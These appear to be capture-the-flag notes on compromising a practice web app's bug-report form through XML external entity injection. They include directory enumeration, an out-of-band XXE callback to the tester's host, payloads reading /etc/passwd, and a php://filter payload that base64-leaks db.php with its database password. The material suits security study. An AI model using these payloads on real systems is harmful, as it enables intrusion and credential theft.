2 :80 xxe

$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php           (Status: 200) [Size: 125]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php            (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]


http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.

http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains form to report bugs

# understanding how the data is sent as Burp sees encoded data being sent
data entered on form > base64 > url_encode > sent.

Using CyberChef we know recipe, using Burp we can try XXE attacks

https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -

# we see request coming back, time to XXE
# Using https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash


# tried using RCE with expect://id
# did NOT WORK; tried a lot

# moving back to reading files, we can now read db.php
# does not work.
# php files are not readable, need to get it encoded in some form

Using the second case: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>

# code
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# encoded value
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D

# send via burp
Title: 	k
CWE: 	k
Score: 	
Reward: 	PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

# base64 decoded
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

Last updated